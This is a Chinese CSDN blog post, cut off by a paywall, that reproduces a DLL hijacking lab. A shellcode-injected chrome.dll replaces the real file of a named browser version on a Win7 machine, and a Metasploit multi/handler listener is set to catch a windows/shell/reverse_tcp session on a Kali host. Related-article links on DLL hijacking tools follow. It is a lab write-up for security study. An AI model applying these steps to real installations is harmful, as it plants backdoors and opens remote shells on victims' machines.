DLL劫持复现

最新推荐文章于 2023-11-11 14:12:17 发布
最新推荐文章于 2023-11-11 14:12:17 发布
阅读量282 收藏
点赞数
文章标签: linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46373658/article/details/128351707
版权
本文通过实例展示了DLL劫持的过程。首先利用backdoor工具检测chrome.dll的注入点,选择合适位置进行恶意DLL注入,然后在Win7系统中替换原文件。成功运行应用后,Kali Linux系统监听到会话,表明命令执行成功。DLL劫持是通过将恶意DLL放在系统搜索路径的优先位置,欺骗系统加载,从而达到控制或影响程序执行的目的。
摘要由CSDN通过智能技术生成 
#环境工具 
kali         #攻击机 172.20.152.11
win7         #目标机 172.20.152.8
backdoor     #dll注入工具
procexp      #线程分析工具
目标应用版本  #某60安全浏览器 12.2.1812.0

已知此应用chrome.dll存在dll注入
请添加图片描述
使用backdoor工具检测注入点
请添加图片描述
随便选择一个可写入空间较大的注入点进行注入
请添加图片描述
文件保存在backdoored目录下 复制到win7替换原文件
请添加图片描述

kali设置监听
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 172.20.152.11
set lport 1111
exploit

最低0.47元/天 解锁文章
红鲤鱼与绿旅驴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dll劫持
SHELLCODE_8BIT的博客
12-01 682
dll劫持_. iDea.的博客-CSDN博客_dll劫持
开启WIN7的DLL劫持支持+各种系统DLL劫持模板源码-易语言
06-12
开启WIN7的DLL劫持支持,重启生效(使程序优先从执行文件所在目录加载DLL而不是系统目录) 主要涉及到:注册表多字符串值 REG_MULTI_SZ 读写。
本地微信DLL劫持提权复现
weixin_46686336的博客
11-11 1700
DLL劫持提权、Windows提权
DEFCON议题解读|Dll劫持新思路——修改环境变量
Jinmindong
03-30 315
1.相对于传统Dll劫持利用Windows加载Dll时的搜索顺序,将恶意Dll存放在目标程序所在文件夹之下来完成Dll劫持。该方式可以保持目标程序所在文件夹的纯净度,可有效规避检测。2. "海量"的Windows服务和内置进程均受环境变量的影响,这值得引起我们安全研究人员对环境变量的重视,以应对后面可能出现的此类攻击手法。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
dll 劫持和应用研究
顶峰
03-31 721
2020年12月,SolarWinds 攻击事件引发全球的关注(),攻击团队在 2020年上旬通过对 SolarWinds Orion产品实现供应链攻击,导致诸多厂商被攻击,造成了不可估量的损失。这种国家间的 APT 攻击包含了大量的技术细节,其中供应链攻击的实现,也就是 SUNBURST 后门植入这一块引起了我极大的兴趣。
dll劫持工具.zip
10-05
DLL劫持DLL Hijacking)是一种在Windows操作系统中利用动态链接库加载机制的安全漏洞进行攻击的技术。DLL文件是Windows系统和应用程序中广泛使用的组件,它们包含可重用的代码和数据,供多个程序共享。当一个程序...
version.dll 劫持源代码
01-08
**version.dll 劫持源代码详解** 在Windows操作系统中,`version.dll` 是一个系统级的动态链接库,主要用于处理应用程序的版本信息。它包含了读取和验证PE(Portable Executable)文件版本资源的函数。然而,有些...
DLL劫持生成软件
08-24
DLL劫持是一种安全漏洞利用技术,攻击者通过将恶意版本的DLL文件放置在系统路径或应用程序搜索路径中,使得程序在运行时错误地加载这个恶意版本,从而实现对系统的控制或数据窃取。 DLL劫持生成软件是一种工具,...
DLLjiechi.zip_delphi 网络_dll_dll劫持_挟持源码
09-22
DLL劫持,又称为DLL挟持,是一种常见的黑客攻击手段,通过篡改程序对DLL的加载顺序或路径,使得恶意的DLL文件得以执行,从而达到控制或监视系统的目的。本篇文章将深入探讨DLL劫持的概念、原理,并结合Delphi编程...
dll劫持payload.dll弹出计算器
03-18
dll劫持payload.dll弹出计算器
DLL劫持C++源代码创建器
03-21
本工具自动创建用于进行DLL劫持的C++源代码。选择你正在运行的应用程序,选择应用程序加载的DLL,本工具为你创建一个用户劫持DLL的源代码。代码中有详细的指导,按照指导去配置你的VS,马上编译一个用来劫持DLL...
一种通用DLL劫持技术研究
11-29
### 一种通用DLL劫持技术研究 #### 概述 DLL劫持是一种常见的技术手段,主要应用于软件开发、安全测试及恶意软件攻击等场景。其基本思路在于利用Windows操作系统的特性,通过替换或预加载特定的动态链接库(DLL)...
AheadLib.exe,DLL劫持工具
12-28
AheadLib.exe DLL导出表,DLL劫持工具
各系统劫持DLL源码
03-25
在IT领域,DLL(Dynamic Link ...总之,DLL劫持是一种利用系统加载机制的攻击手段,需要我们深入了解其原理,采取有效的预防措施,同时,对于开发者来说,学习和理解DLL劫持的源码有助于提高安全意识和防御能力。
x64 version.dll 劫持源代码
最新发布
04-25
在IT领域,尤其是系统安全和逆向工程中,“dll劫持”是一个常见的概念。这篇讨论主要聚焦于在C++环境下,针对x64架构的`version.dll`的劫持源代码。`version.dll`是Windows操作系统中用于处理应用程序版本信息的动态...
dll劫持
hongduilanjun的博客
03-07 6318
title: 初探dll劫持 tags: 二进制 date: 2021/10/03 toc: true 本文将对dll劫持进行分析和利用。 基础知识 DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。 在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件。 在windows平台下,很多应用程序的很多功能是相似的,抛去ui等等来说,大致的功能都差不多,比如都得调用窗口,都得调用内存管理的.
WIN7下DLL劫持,注入
非鱼
03-23 7881
综述: dll劫持,粗略整理了下,可以劫持dll有: lpk.dll、usp10.dll、msimg32.dll、midimap.dll、ksuser.dll、comres.dll、ddraw.dll 一、修改注册表,使得程序从执行文件所在目录加载DLL XP: 把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contr
DLL劫持原理&防御方法
热门推荐
安全杂货铺
05-18 2万+
1.原理介绍 DLL劫持指的是,病毒通过一些手段来劫持或者替换正常的DLL,欺骗正常程序加载预先准备好的恶意DLL。 如下图,LPK.dll是应用程序运行所需加载的DLL,该系统文件默认在C:\Windows\system32路径下,但由于windows优先搜索当前路径,所以当我们把恶意LPK.dll放在应用程序同一路径下,便会被程序成功加载,从而执行恶意操作。 2.实例分析 下面以APT32攻...
Dll注入技术之劫持注入
Hades的博客
06-28 1万+
Dll注入技术之劫持注入测试环境系统:Windows 7 32bit工具:FileCleaner2.0 和 lpk.dll主要思路利用Window可以先加载当前目录下的dll特性,仿造系统的LPK.DLL,让应用程序先加载我们的伪LPK.DLL,然后在我们的dll中去调用原来系统的原函数.引用网络中的原理讲解●背景知识●首先我们要了解Windows为什么可以DLL劫持呢?主要是因为Windows的...
易语言编写dll劫持补丁
09-17
在编写dll劫持补丁时,可以使用易语言来实现。 首先,dll劫持是指通过修改被劫持的进程加载的dll路径或名称,使其加载恶意的dll文件。编写dll劫持补丁实际上是为了修复这个漏洞,使被劫持的进程加载正确的dll文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值